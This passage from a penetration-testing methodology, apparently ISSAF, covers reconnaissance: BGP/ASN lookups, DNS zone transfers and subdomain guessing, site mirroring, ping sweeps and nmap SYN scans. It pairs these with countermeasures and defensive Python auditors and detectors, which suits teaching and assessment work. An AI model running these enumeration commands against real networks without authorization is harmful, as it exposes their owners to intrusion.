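    """Hops in delivery order (origin first), one dict per Received header.
    Relays prepend their header, so the stored order is reversed."""
    msg = email.message_from_string(raw_message)
    hops = []
    for text in reversed(msg.get_all("Received", [])):
        hop = dict.fromkeys(("helo", "rdns", "ip", "is_internal", "by", "by_software", "with"))
        m = FROM_RE.search(text)
        if m:
            hop["helo"], hop["rdns"], hop["ip"] = m.group(1), m.group(2) or None, m.group(3)
            if hop["ip"]:
                hop["is_internal"] = is_internal(hop["ip"])
        m = BY_RE.search(text)
        if m:
            hop["by"], hop["by_software"] = m.group(1), m.group(2)
        m = WITH_RE.search(text)
        if m:
            hop["with"] = m.group(1).strip()
        hops.append(hop)
    return hops


def leaks(raw_message, own_domain="pentester.example"):
    """Summarize what the headers give away; hosts under own_domain (the assessor's
    mail system, which always appears as the final 'by') are ignored."""
    hops = parse_received_path(raw_message)
    names = {n for h in hops for n in (h["helo"], h["rdns"], h["by"]) if n}
    mid = email.message_from_string(raw_message).get("Message-ID", "")
    if "@" in mid:
        names.add(mid.rsplit("@", 1)[1].rstrip("> ").strip())
    names = {n for n in names if not n.lower().endswith("." + own_domain)}
    software = {h["by_software"] for h in hops if h["by_software"]}
    software |= {h["with"] for h in hops
                 if h["with"] and h["with"].lower() not in PROTOCOL_TOKENS}
    return {
        "internal_ips": [h["ip"] for h in hops if h["is_internal"]],
        "hosts": sorted(names),
        "descriptive_names": sorted(n for n in names
                                    if any(k in n.lower().split(".")[0] for k in DESCRIPTIVE)),
        "software": sorted(software),
    }


if __name__ == "__main__":
    for hop in parse_received_path(SAMPLE_MESSAGE):
        print(hop)
    print(leaks(SAMPLE_MESSAGE))
```

On the constructed message the summary shows two internal addresses, three descriptively named hosts (an Exchange server, an antivirus gateway and a mail gateway) and the software behind two of the relays, which is exactly the correlation input the process steps above call for.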
B.1.22 Perform BGP (Border Gateway Protocol) Query
Description
• BGP is the de facto routing protocol on the Internet for large networks/ISPs
• Each participating network is identified by an Autonomous System Number (ASN), the
equivalent of a whois handle
• An ASN can be queried for additional information
• This may provide additional addresses/networks belonging to the target
Examples/Results
Determine the ASN:
• whois "ASN <target>"@whois.arin.net
Determine network ranges by connecting to a border router:
• telnet <target> (in practice a public route server or looking glass is used; the target's
own routers must not be logged into without authorization)
• show ip bgp regexp _<ASN>$
• e.g. show ip bgp regexp _46$ (the underscore matches the AS-path separator and the $
anchors the ASN at the end of the path, so this lists the prefixes originated by AS 46)
Analysis/Conclusion/Observation
BGP enumeration may provide additional addresses and network information to both
attackers and assessors.
Countermeasures
Routing information is public by design, so BGP enumeration itself cannot be prevented; the
measures below limit what an attacker can do with the discovered ranges.
• Ideally, a secure version of the protocol should be implemented; however, S-BGP
and soBGP have still not been widely accepted as standards (performance and
implementation costs). Organizations should nevertheless be aware that such protocols
might eventually be adopted to counter security risks.
• Block ICMP echo requests at the firewall or external router
• Block UDP packets at the firewall
• Allow traffic in through the firewall only to specific hosts
Links
• http://www.cisco.com/univercd/cc/td/doc/product/software/ios123/123cgcr/iprrp_r/ip2_s2g.htm#wp1039007
• https://www.cs.dartmouth.edu/~zhaom/research/papers/TR2003-440.pdf
Tools
• whois
• telnet
• netcat
Remarks
Many organizations do not run BGP. If this is the case, no ASN records will be available.
When getting ASN records with whois, different command forms can be used depending on
your version of whois. The second line of each pair illustrates a specific query by object
type (e.g. NET, ASN); x.x.x.x is the IP address:
• whois x.x.x.x@whois.arin.net
• whois "NET x.x.x.x"@whois.arin.net
or
• whois -h whois.arin.net x.x.x.x
• whois -h whois.arin.net "NET x.x.x.x"
B.1.23
DNS Interrogation - Perform Zone Transfer on Primary,
Secondary and ISP name server
Description
The DNS database provides the mapping between IP addresses and hostnames. Zone transfer is used to synchronize primary and secondary name servers. Zone transfers should be allowed between the authorized servers only, and external name servers should not allow leakage of internal information.
For load balancing and fault tolerance there is always more than one name server. The main name server is called the "primary name server", and all subsequent name servers are called "secondary name servers".
The primary and secondary name servers both hold a domain-to-IP mapping for each host in the zone file. A secondary name server requests a zone transfer from the primary name server under the following conditions:
• The refresh interval of the secondary name server has elapsed
• The DNS service of the secondary name server has just been restarted
• The secondary name server has just been placed in the network
If any one of the above conditions is met, the following process takes place:
Step One: The secondary name server requests the Start Of Authority (SOA) record from the primary name server.
Step Two: The primary name server sends back its SOA record to the secondary name server.
Step Three: The serial number field of the primary name server's SOA record is compared with the secondary's. If the primary's SOA has a higher serial number, the secondary server's zone file is out of date and a new one must be requested. This is done with an AXFR request ("all zone" transfer request).
Step Four: On receiving the AXFR request from the secondary name server, the primary name server sends all the records for every host in the zone to the secondary server.
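The four-step refresh above can be modelled in a few lines. The following is an added illustration, not ISSAF tooling: an in-memory "primary" and "secondary" (names, addresses and serial numbers are constructed) walk through the SOA query, the serial comparison and the AXFR request. Two points the prose leaves implicit are made concrete: SOA serials are 32-bit and wrap, so the comparison must use RFC 1982 serial-number arithmetic rather than plain integer ordering, and a primary that honours the countermeasure "restrict zone transfers to trusted servers" answers the AXFR only when the requester is on its transfer list.

```python
"""Secondary name server refresh check (added illustration, not from ISSAF).

Models steps one to four of the zone-refresh procedure: the secondary fetches
the primary's SOA, compares serial numbers under RFC 1982 rules and, only when
the primary is newer, requests a full zone transfer (AXFR). The "primary" is an
in-memory stand-in; nothing is sent on the network.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

Record = Tuple[str, str, str]          # (owner, type, rdata)
SERIAL_MOD = 1 << 32
SERIAL_HALF = 1 << 31


def serial_gt(a: int, b: int) -> bool:
    """True if serial a is newer than b under RFC 1982 serial arithmetic.

    Serials wrap modulo 2**32, so 5 is newer than 4294967295 after a wrap.
    A difference of exactly 2**31 is undefined in the RFC; treated as not newer.
    """
    a %= SERIAL_MOD
    b %= SERIAL_MOD
    return (a < b and b - a > SERIAL_HALF) or (a > b and a - b < SERIAL_HALF)


@dataclass
class Zone:
    origin: str
    serial: int
    records: List[Record] = field(default_factory=list)


class Primary:
    """Constructed stand-in for an authoritative primary server."""

    def __init__(self, zone: Zone, allow_transfer: Set[str]):
        self.zone = zone
        self.allow_transfer = allow_transfer   # plays the role of an allow-transfer ACL

    def soa_query(self) -> int:
        # Steps one and two: the secondary asks for the SOA, the primary returns its serial.
        return self.zone.serial

    def axfr(self, client_ip: str) -> Optional[List[Record]]:
        # Step four, gated by the transfer ACL: unlisted requesters are refused.
        if client_ip not in self.allow_transfer:
            return None
        return list(self.zone.records)


def refresh_secondary(secondary: Zone, primary: Primary, my_ip: str) -> str:
    """Run one refresh cycle and report what the secondary did."""
    primary_serial = primary.soa_query()
    if not serial_gt(primary_serial, secondary.serial):
        return "up-to-date"                       # step three: nothing newer on the primary
    records = primary.axfr(my_ip)
    if records is None:
        return "transfer-refused"
    secondary.records = records
    secondary.serial = primary_serial
    return "transferred"


if __name__ == "__main__":
    primary = Primary(Zone("example.test.", 2005060502, [("www", "A", "192.0.2.10")]),
                      allow_transfer={"192.0.2.53"})
    secondary = Zone("example.test.", 2005060501)
    print(refresh_secondary(secondary, primary, "198.51.100.9"))   # not on the ACL
    print(refresh_secondary(secondary, primary, "192.0.2.53"))     # authorised secondary
```

The assessor-side observation follows directly: a server whose transfer list is empty or set to "any" will hand the zone to the unlisted requester as readily as to its own secondary.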
The zone file contains the following very common Resource Records:
Start of Authority Record (SOA)
It determines the version of the zone file. Whenever a change occurs in the network, say a host is added, deleted or changed, the primary name server increments the serial number in the zone file. It also holds the email address of the person responsible for managing the primary name server.
Name Server Record (NS)
It indicates the name server authoritative for the zone.
Address Record (A)
It maps a host name to an IP address.
Pointer Record (PTR)
It maps an IP address to a host name.
MX Record (MX)
It specifies a mail exchanger in a DNS domain.
RFC 1034
www.ietf.org
Perform zone transfers on the primary, secondary and ISP name servers. In many cases organizations do not adequately control access to their secondary name servers.
Pre-Requisites
Incorrectly configured Domain Name Server
Examples/Results
Zone transfer with nslookup
• nslookup
• > server <ipaddresses>
• > set type=any
• > ls -d <target.com>
Zone transfer with host
Command:
• # host -l -v -t any <target.com>
Prerequisites:
• Incorrectly configured Domain Name Server
Zone transfer with axfr
Command:
• axfr <target.com>
• axfrcat <target.com>
Prerequisites:
• Incorrectly configured Domain Name Server
• Recursively transfers zone information
• Creates a compressed database of
  o Zone information
  o Host file
Zone transfer with dig
• # dig axfr <domain> @dns-server
Analysis/Conclusion/Observation
Zone transfers allow attackers and assessors to determine the makeup of the network. This
information can be extremely useful to mount several types of network attacks (e.g. packet
injection attacks).
Countermeasures
• Separate internal and external DNS servers (split DNS)
  A split DNS configuration consists of an internal server with the database of all the DNS names within the organization and an external server that knows only how to resolve names dealing with the external presence, such as e-mail forwarders and web servers. This prevents internal network information from being accessible to the external world.
  In Windows 2000 environments use Active Directory integrated DNS servers internally and an external DNS server separated from the Windows domain.
  Don't use the external DNS server as a forwarder for the internal DNS server. Use the provider's DNS servers instead.
• Restrict zone transfers to a specific list of trusted servers
  Configure primary name servers to perform zone transfers only to their secondary (slave) servers. Since zone transfers move all the records for a particular zone from one server to another, it is extremely important not to transfer the forward lookup zone of a DNS server that contains domain information to any server outside the domain.
  Block TCP port 53 on the border firewall(s).
• Disable dynamic updates on external DNS servers
  Recent versions of DNS servers have options for dynamic update of the zone database by integrating with network services including WINS and DHCP. This should be disabled for external DNS servers, and only the records required for bare minimum functionality should be added manually to the zone database.
• Do not configure HINFO records
  The Host Information Record (HINFO) is strictly informational and not functional. It is used to declare the computer type and operating system of a host. This information can be used to fingerprint a network, so publishing it is not recommended.
• Run DNS as a non-root user
  Name servers are susceptible to root compromise through buffer overflow attacks when the DNS daemon is run as root. It is safer to run the DNS daemon as a non-root user to minimize damage in case of a DNS server compromise.
• Run the DNS daemon in a chroot jail
  The damage that a successful attacker can inflict can be further limited by running named in a chroot-ed environment. The Unix chroot system call changes the root directory of a process, such that the process can no longer access any of the files above the specified root directory in the file system hierarchy. All zone files and configuration files need to be in the chroot directory.
• Secure the file system/registry
  Secure configuration of ownership and permissions of the DNS server's relevant files is recommended. For Microsoft Windows environments the registry entries also need to be secured.
• Disable all unnecessary services on DNS servers
  DNS servers should be configured to run the minimum of services and applications to reduce the chance of compromise due to application weaknesses.
• Update servers with the latest security fixes
  DNS servers should be regularly patched with the latest security hot fixes and patches for known vulnerabilities.
• Enable logging of transactions
  Configure logging and monitor logs on a regular basis. Analysis of logs will identify malicious activities and provide early warning signals.
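Several of the countermeasures above can be checked mechanically before an assessor does it for you. The script below is an added example, not part of ISSAF or of BIND: it reads a BIND-style named.conf fragment and a zone file (both constructed inline, with documentation addresses) and reports zone transfers open to anyone, dynamic updates enabled, HINFO records, and private RFC 1918 addresses published in what is supposed to be the external zone (a split-DNS violation). The parser understands only the directives shown here and assumes the zone uses relative owner names; it is a review aid, not a replacement for named-checkconf.

```python
"""Audit of an external name server's configuration against the ISSAF
countermeasures (added example; not ISSAF or BIND code).

Reads a BIND-style named.conf fragment and a zone file, both constructed
inline, and flags: allow-transfer missing or 'any', allow-update present,
HINFO records, and private (RFC 1918) addresses in an external zone.
"""
import ipaddress
import re

# Constructed configuration of a deliberately weak external server.
NAMED_CONF = """\
options {
    directory "/var/named";
    allow-transfer { any; };
    recursion no;
};
zone "example.test" IN {
    type master;
    file "example.test.zone";
    allow-update { 192.0.2.0/24; };
};
"""

# Constructed zone: one internal address and one HINFO record slipped in.
ZONE_FILE = """\
$TTL 3600
@       IN  SOA ns1.example.test. hostmaster.example.test. (2005060501 3600 900 604800 3600)
        IN  NS  ns1.example.test.
        IN  MX  10 mail.example.test.
www     IN  A   203.0.113.10
mail    IN  A   203.0.113.25
intranet IN A   10.1.2.3
fw1     IN  HINFO "PC-Intel" "Linux"
"""

PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ACL_RE = re.compile(r"(allow-(?:transfer|update))\s*\{([^}]*)\}")


def parse_acls(conf):
    """Return {directive: [entries]} for every allow-transfer/allow-update block."""
    acls = {}
    for name, body in ACL_RE.findall(conf):
        acls.setdefault(name, []).extend(e.strip() for e in body.split(";") if e.strip())
    return acls


def parse_zone(zone):
    """Return (owner, type, rdata) tuples; a line starting with whitespace reuses the last owner."""
    records, owner = [], None
    for line in zone.splitlines():
        if not line.strip() or line.startswith("$"):
            continue
        if line[0].isspace():
            rest = line.strip()
        else:
            owner, rest = line.split(None, 1)
        fields = rest.split()
        if fields and fields[0] == "IN":
            fields = fields[1:]
        records.append((owner, fields[0], " ".join(fields[1:])))
    return records


def audit(conf, zone):
    """Return a list of human-readable findings (empty means nothing flagged)."""
    findings = []
    acls = parse_acls(conf)
    transfer = acls.get("allow-transfer", [])
    if not transfer or "any" in transfer:
        findings.append("zone transfers are not restricted to trusted secondaries")
    if acls.get("allow-update"):
        findings.append("dynamic updates are enabled on an external server")
    for owner, rtype, rdata in parse_zone(zone):
        if rtype == "HINFO":
            findings.append(f"HINFO record on {owner} leaks platform details: {rdata}")
        elif rtype == "A":
            addr = ipaddress.ip_address(rdata)
            if any(addr in net for net in PRIVATE_NETS):
                findings.append(f"{owner} publishes private address {addr} (split DNS violated)")
    return findings


if __name__ == "__main__":
    for finding in audit(NAMED_CONF, ZONE_FILE):
        print("-", finding)
```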
Links
• http://wn.wikipedia.org/wiki/AXFR
• http://www.ietf.org/rfc/2845.txt
• http://www.ietf.org/rfc/2930.txt
• http://www.ietf.org/rfc/3008.txt
• http://www.ietf.org/internet-drafts/draft-ietf-dnsext-axfr-clarify-05.txt
• http://www.ietf.org/internet-drafts/draft-ietf-dnsext-dnssec-roadmap-06.txt
Tools
• Dig
• Nslookup
• Samspade (both website & Windows tool)
• Whois
Remarks
Many companies configure their DNS correctly, so it is highly probable that DNS zone transfers will be unsuccessful during an assessment.
B.1.24 DNS Interrogation - Perform Zone Transfer by dictionary attack
Description
In cases where organizations have properly controlled access to their DNS servers and zone transfers are refused, one can still try a dictionary attack against the name server to identify critical hosts.
These attacks are performed using automated tools/scripts. The tool queries the target DNS server for 'A' records by matching host names (e.g. router.target.com, firewall.target.com, ids.domain.com, etc.), and reports the associated IP address.
The success of this step depends on how much effort you put into customizing the target dictionary. Follow the dictionary customization process from the password security assessment section.
Examples/Results
Example with dnsdigger.pl tool:
Command:
• # ./dnsdigger.pl <domain>
Example with dnsenum.pl tool:
Command:
• # ./dnsenum.pl <domain> <dictionary file>
Analysis/Conclusion/Observation
Successful DNS interrogation through dictionary attack allows attackers and assessors to
identify network servers and structure. This information is important for some types of
network attacks (e.g. packet injection).
Countermeasures
• Whenever possible, avoid using common (easy to guess) names for critical network servers.
  o A random (or meaningful but cryptic) string of a few characters could be appended to network names to make guessing more difficult (e.g. ftpsd3.targetorg.com instead of ftp.targetorg.com)
  o Note that some standards require established naming conventions, and in other cases it is not convenient to change the name for aesthetic or practical reasons (e.g. www-gt4.target-domain.com instead of www.targetdomain.com). Therefore, there is no point in renaming public servers. Consider this solution only for servers that have to be publicly available on the internet but provide services to only a restricted number of users or organizations (e.g. a web portal for intranet access by remote users of the organization).
• Establish authenticated DNS protocols, if possible; restrict zone transfers to only authorized servers
• Allow specific zone transfers only with the allow-transfer directive in named.conf
• Deny all unauthorized inbound connections to TCP port 53
• Use the "notify" option in Microsoft's DNS
Links
• http://www.ietf.org/rfc/2845.txt
• http://www.ietf.org/rfc/2930.txt
• http://www.ietf.org/rfc/3008.txt
• http://www.ietf.org/internet-drafts/draft-ietf-dnsext-dnssec-roadmap-06.txt
Tools
• Dnsdigger
• Dnsenum
Remarks
The use of appropriate dictionaries is important for the success of this test. Choose names carefully, taking into account:
• Common network services (e.g. ftp, www, dns, web, email, etc.)
• The language that might have been used to name the servers, based on location and public information of the target organization (e.g. location of headquarters)
• Common acronyms
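From the defender's side, a dictionary run against an authoritative server has a recognisable shape: one client asks for many distinct names under the zone in a short time, and almost all of them come back NXDOMAIN. The detector below is an added example (not ISSAF, dnsdigger or dnsenum code) that scores per-client sliding windows over query logs. The log lines are constructed in a simplified "time client qname rcode" form; a real server's query/response log would need to be mapped into that shape first, and the thresholds are starting-point assumptions to tune per environment.

```python
"""Detection of hostname guessing against an authoritative name server
(added example; not part of ISSAF or of any DNS enumeration tool).

Flags clients that, within a sliding time window, issue at least
min_nxdomain queries answered NXDOMAIN and whose NXDOMAIN share is at
least min_ratio. Log lines are constructed: "time client qname rcode".
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log: 203.0.113.7 is an ordinary resolver, 198.51.100.9 is guessing names.
LOG_LINES = """\
2005-06-05T10:42:01 203.0.113.7 www.example.test NOERROR
2005-06-05T10:42:02 198.51.100.9 ftp.example.test NXDOMAIN
2005-06-05T10:42:02 198.51.100.9 router.example.test NXDOMAIN
2005-06-05T10:42:02 198.51.100.9 firewall.example.test NXDOMAIN
2005-06-05T10:42:03 198.51.100.9 ids.example.test NXDOMAIN
2005-06-05T10:42:03 198.51.100.9 vpn.example.test NOERROR
2005-06-05T10:42:03 198.51.100.9 mail.example.test NOERROR
2005-06-05T10:42:04 198.51.100.9 intranet.example.test NXDOMAIN
2005-06-05T10:42:04 198.51.100.9 db.example.test NXDOMAIN
2005-06-05T10:42:05 203.0.113.7 mail.example.test NOERROR
2005-06-05T10:42:09 203.0.113.7 typo.example.test NXDOMAIN
""".splitlines()


def parse(line):
    """Split one constructed log line into (timestamp, client, qname, rcode)."""
    ts, client, qname, rcode = line.split()
    return datetime.fromisoformat(ts), client, qname.lower(), rcode


def detect_guessing(lines, window=timedelta(seconds=60), min_nxdomain=5, min_ratio=0.6):
    """Return {client: (queries, nxdomains, distinct_names)} for the worst window per suspect."""
    events = defaultdict(list)
    for line in lines:
        ts, client, qname, rcode = parse(line)
        events[client].append((ts, qname, rcode))

    suspects = {}
    for client, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            nx = sum(1 for _, _, rc in win if rc == "NXDOMAIN")
            if nx >= min_nxdomain and nx / len(win) >= min_ratio:
                names = {q for _, q, _ in win}
                suspects[client] = (len(win), nx, len(names))   # keeps the latest, largest window
    return suspects


if __name__ == "__main__":
    for client, (total, nx, names) in detect_guessing(LOG_LINES).items():
        print(f"{client}: {total} queries, {nx} NXDOMAIN, {names} distinct names")
```

A resolver that occasionally asks for a mistyped name stays under the NXDOMAIN count; a client walking a wordlist crosses both thresholds within its first few seconds.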
B.1.25 DNS INTERROGATION - Finding IPv6 IP blocks in use through DNS queries
Description
Identify IPv6 blocks within the network of the target organization. Several provisions should be taken when testing these network blocks.
Examples/Results
Perform normal DNS interrogation procedures.
Example with dig, reporting IPv6 addresses with type AAAA:
# dig @ns.targetprovider.net targetdomain.com -t ANY
; Authoritative data for targetdomain.com
@            IN  SOA   ns.ipv6.targetprovider.net ...
...
targetservX  IN  A     XXX.XXX.XXX.XXX
targetservX  IN  AAAA  XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX
...
Analysis/Conclusion/Observation
Successful DNS interrogation through DNS queries allows attackers and assessors to
identify network servers and structure. This information is important for some types of
network attacks (e.g. packet injection).
Countermeasures
• Restrict zone transfers to only authorized servers
• Allow specific zone transfers only with the allow-transfer directive in named.conf
• Deny all unauthorized inbound connections to TCP port 53
• Use the "notify" option in Microsoft's DNS: http://support.microsoft.com/support/kb/articles/q193/8/37.asp
• External name servers should not allow leakage of internal information
• Limit use of HINFO records
Links
• http://en.wikipedia.org/wiki/AAAA_record#IPv6_and_the_Domain_Name_System
• http://www.ietf.org/rfc/rfc3363.txt
• http://www.ietf.org/rfc/rfc3364.txt
Tools
• dig
Remarks
B.1.26 Mirror Target Web Site
Description
It is wise to use an offline browser such as HTTrack, or preferably wget, to completely mirror all target websites (including any personal websites located).
Process
• Grab the target website offline
• Understand the web implementation logic and chart out the logical web-tree
• Note down the webserver(s), server banners and version information
• Search the local web-tree for all e-mail addresses and other useful information, particularly the pages in the job posting sub-branch
• Check for repetitive words in the web-tree; one can build a user/password list from this information
• Use tools which can build effective dictionaries from web pages (words commonly used on the website are likely passwords in the organization)
Analysis/Conclusion/Observation
Both an attacker and an assessor will review the information gathered through this technique. Review the source code of all pages for the following (refer: web application section):
• Comments (e.g. username and password)
• Database connectivity
• Meta tags
• Confidential information
• Hidden fields
• Search for keywords (e.g. "pass", "password", "server", "database", "login")
• Web programming patterns (i.e. errors and vulnerabilities could repeat in several pages)
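The same checklist works as a pre-publication review on the defending side. The script below is an added example (not ISSAF, HTTrack or wget code): it walks a constructed HTML page with Python's standard-library parser and reports every HTML comment, hidden form field and meta tag, together with any text or comment that contains one of the checklist keywords (pass, password, server, database, login). The sample page, including its leftover developer comment and its credential, is invented for the example; run the reviewer over a mirrored copy of your own site to see what a mirroring assessor would find.

```python
"""Pre-publication review of a web page for the leaks listed in the ISSAF
checklist (added example; not ISSAF, HTTrack or wget code).

Reports HTML comments, hidden fields, meta tags, and checklist keywords
found in comments or visible text. The page below is constructed.
"""
import re
from html.parser import HTMLParser

KEYWORDS = ("pass", "password", "server", "database", "login")
KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)

# Constructed page: a developer comment with a test credential was never removed.
SAMPLE_PAGE = """\
<html><head>
<meta name="generator" content="ExampleCMS 2.1">
<meta name="description" content="Partner portal">
</head><body>
<!-- TODO: remove before go-live. db login: appuser / Summer2005 on database dbsrv01 -->
<form action="/login" method="post">
  <input type="hidden" name="debug" value="1">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<p>Contact webmaster@example.test for access.</p>
</body></html>
"""


def keyword_hits(text):
    """Distinct checklist keywords present in text, lower-cased and sorted."""
    return sorted({m.lower() for m in KEYWORD_RE.findall(text)})


class LeakFinder(HTMLParser):
    """Collects (kind, detail, keyword_hits) findings while the page is parsed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_comment(self, data):
        # Every comment is reported: comments never belong in production pages.
        self.findings.append(("comment", data.strip(), keyword_hits(data)))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.findings.append(("hidden-field", f"{a.get('name')}={a.get('value')}", []))
        elif tag == "meta" and a.get("name"):
            self.findings.append(("meta", f"{a['name']}: {a.get('content', '')}", []))

    def handle_data(self, data):
        hits = keyword_hits(data)
        if hits:
            self.findings.append(("text", data.strip(), hits))


def review(html):
    """Parse one page and return its findings in document order."""
    finder = LeakFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for kind, detail, hits in review(SAMPLE_PAGE):
        print(f"[{kind}] {detail}" + (f"  keywords={hits}" if hits else ""))
```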
Countermeasures
To avoid critical information leaks, organizations should ensure that:
• Comments in production web pages and applications do not include sensitive information
• Confidential information is separated into different repositories from public information. Access to this information should be restricted and controlled (e.g. a single access path with authentication controls in place)
• Appropriate session management controls are implemented in the corresponding web pages and applications, in order to avoid access to restricted information by non-authorized users, or by users that have not started a session properly.
Links
• http://www.httrack.com/page/2/en/index.html
• http://www.gnu.org/software/wget/wget.html
Tools
• HTTrack (Windows and Unix)
• GNU wget
Remarks
Web mirroring is very consuming in terms of time and resources. The depth of the mirroring process and the starting web pages should be carefully selected.
B.1.27 Global Countermeasures
Countermeasures
Along with information gained from the above steps, a security assessor could suggest the following countermeasures to safeguard the target against such attacks:
• Limit giving public information
• Release organizational information only on a need-to-know basis
  o Do not give information on your network architecture to the media
  o Do not give configuration details in the public domain
  o Limit the use of names in e-mail addresses (e.g. Sales@target.com rather than j0hnny@target.com)
• Whois information
  o Do not give a technical person's name in the whois database
  o Do not give telephone numbers belonging to your company's telephone range
  o Use "generic" names such as "hostmaster" and/or "postmaster"
  o Use a unique phone number (e.g. located in the server room … if an external call comes onto that phone …)
• DNS information
  o Restrict the use of HINFO records
  o Use the notify option of Microsoft DNS
  o Restrict zone transfers to authorized parties
• Use non-associated e-mails for the whois database (or use "generic" emails such as postmaster@<company>.com)
• Use PGP for changing whois information
• Restrict DNS zone transfer (from the internet)
  o Allow zone transfer on the server only to authorized domains and/or only to second-level DNS servers (backup DNS servers)
  o Allow TCP port 53 on the firewall only to authorized domains and/or only to second-level DNS servers (backup DNS servers)
  o Use split horizon DNS (separate zones internally and externally); it ensures that internal hostnames aren't referenced to IP addresses within the DNS zone file of the public DNS
  o Make sure HINFO and other records don't come into view in DNS zone files.
• Email system
  o SMTP servers must be configured to
    - ignore email messages addressed to unknown recipients
    - send responses in such a way that they don't include email relay host information or the internal IP addressing scheme
    - (examples of email relay servers are MS Exchange, Qmail, Sendmail etc.)
    - remove information from the email headers (on the email relay server)
• Search engine
  o Disable directory listing in the web server
  o Never put sensitive information online on publicly accessible servers
• Social engineering
  o It is recommended to use a centralized network administration contact to safeguard against social engineering
Links
Suggested reading to hone your skills in this domain:
General information
• http://neworder.box.sk/newsread.php?newsid=6575
• http://bit.csc.lsu.edu/~yixin/frame.dir/main.dir/course.dir/infoGathering.html
Big Brother System and Network Monitor
• http://bb4.com
Watching the Watchers II-2 by j0hnny
• http://johnny.ihackstuff.com/security/premium/04-01-2003Watching_the_Watchers_II-2.ppt
Tools
• Several network vulnerability scanners
Remarks
B.2 NETWORK MAPPING (SCANNING, OS FINGERPRINTING AND ENUMERATION)
Description
Following the first section when all possible information about the target has been
acquired, a more technical approach is taken to ‘footprint’ the network and resources in
question. Network specific information from the previous section is taken and expanded
upon to produce a probable network topology for the target. Many tools and applications
can be used during this stage to aid the discovery of technical information about the
hosts and networks involved in the test.
Aim/Objective
During the initial stage the aim was to gain general knowledge and information about the organization involved; this section focuses on the technical aspects. During network mapping and enumeration you are attempting to identify all live hosts, operating systems involved, firewalls, intrusion detection systems, servers/services, perimeter devices, routing and general network topology (physical layout of the network) that are part of the target organization. This allows us to move to the next stage and identify any actual vulnerabilities. During this section you are aiming to find out what the network contains (hosts/servers/routers and other devices) and how it works (using what protocols/operating systems). You should look to gain every piece of information you can, including e-mail addresses, NetBIOS names, NFS exports, hostnames, WHOIS information, externally accessible services etc. This is by far the most important stage in the penetration testing process. Failing to have a "good" network map can result in false positives when vulnerabilities are assessed.
B.2.1 Identify Live Hosts
Description
Finding live hosts is the first step (or one of the first steps) in network mapping. This step can severely narrow down the number of systems that should be tested/investigated. Most default ping commands use ICMP as the underlying protocol; some tools can also send TCP packets to find out whether a remote host is active or not (very useful if the remote network is blocking ICMP).
Examples/Results
Using ping
Using nmap (icmp): nmap -sP -vv <target>
# nmap -v -sP 10.3.8.1-50
Starting nmap V. 3.81 (www.insecure.org/nmap/)
Host (10.3.8.1) appears to be down.
Host (10.3.8.2) appears to be down.
Host (10.3.8.3) appears to be down.
Host (10.3.8.4) appears to be down.
Host (10.3.8.5) appears to be up.
Using nmap -sP with the -PE, -PA or -PS switches should yield better results.
Using nmap (tcp): nmap -sP -vv -PS80 <target>
# nmap -sP -vv -PS80 10.3.8.1-50
Starting nmap V. 3.81 (www.insecure.org/nmap/)
Host (10.3.8.1) appears to be down.
Host (10.3.8.2) appears to be down.
Host (10.3.8.3) appears to be down.
Host (10.3.8.4) appears to be down.
Host (10.3.8.5) appears to be up.
Using hping (tcp examples): hping -S -c 2 <target>
[root@localhost root]# hping -S -c 2 10.3.8.5
HPING 10.3.8.5 (eth1 10.3.8.5): S set, 40 headers + 0 data bytes
len=46 ip=10.3.8.5 ttl=60 id=1650 sport=0 flags=RA seq=0 win=0 rtt=2.8 ms
len=46 ip=10.3.8.5 ttl=60 id=1651 sport=0 flags=RA seq=1 win=0 rtt=2.4 ms
[root@localhost root]# hping -S -c 2 10.3.8.1
HPING 10.3.8.1 (eth1 10.3.8.1): S set, 40 headers + 0 data bytes
ICMP Host Unreachable from ip=10.3.8.64 name=UNKNOWN
ICMP Host Unreachable from ip=10.3.8.64 name=UNKNOWN
Analysis/Conclusion/Observation
Normally, a list of live hosts should be created using this step.
• Nmap examples: here the first four hosts are either down or ICMP is blocked, and the fifth host is up and replying to ping requests.
• Hping examples: the ICMP host unreachable error indicates that the host is down, while getting the Reset/Ack flags back shows that the host is up.
A list of live hosts means only that these hosts are visible from the assessor's testing location. Hosts reported dead are either actually not alive or traffic to them is being filtered.
Countermeasures
Links
• http://www.insecure.org
• http://www.hping.org
Tools
• Hping
• Fping
• Unix ping
• Windows ping
• Nmap
• traceroute
• tcptraceroute
Gopher testing: Ping statistics (e.g. packet TTL)
Remarks
• As you start live host detection, you should also run a passive fingerprinting tool in the background; it will help you to identify operating systems simultaneously.
• If nothing is found using this step, this probably means one of the following, and you should investigate further:
  o the target network is not reachable
  o the target network is protected by a properly configured firewall
  o the target system is not reachable
• Using different techniques to identify live hosts will increase the probability of success (TCP scanning is particularly effective against firewalls and network filters)
B.2.2 Determine running Services
Finding running services can be done with port scanning. While finding these services, version information should be gathered as well, and operating system guessing can also be performed by looking at the running services.
B.2.2.1 FIND OPEN PORTS
B.2.2.1.1 TCP PORT SCANNING
Description
TCP port scanning will give you all listening, closed or filtered TCP ports on a certain target. TCP port scanning can be performed either by performing a full TCP 3-way handshake (TCP connect scans) or by performing a SYN scan (stealth scanning or half-open scanning).
The following example will scan the target and list all the open services running on it. It uses the half-open scan feature of nmap (aka stealth scan).
Examples/Results
Using nmap with SYN stealth scanning and verbose output:
# nmap -sS 10.3.8.5 -vv
Starting nmap V. 3.81 ( www.insecure.org/nmap/ )
Host (10.3.8.5) appears to be up ... good.
Initiating SYN Stealth Scan against (10.3.8.5)
Adding open port 280/tcp
Adding open port 515/tcp
Adding open port 631/tcp
Adding open port 80/tcp
Adding open port 9100/tcp
Adding open port 21/tcp
Adding open port 23/tcp
The SYN Stealth Scan took 16 seconds to scan 1601 ports.
Interesting ports on (10.3.8.5):
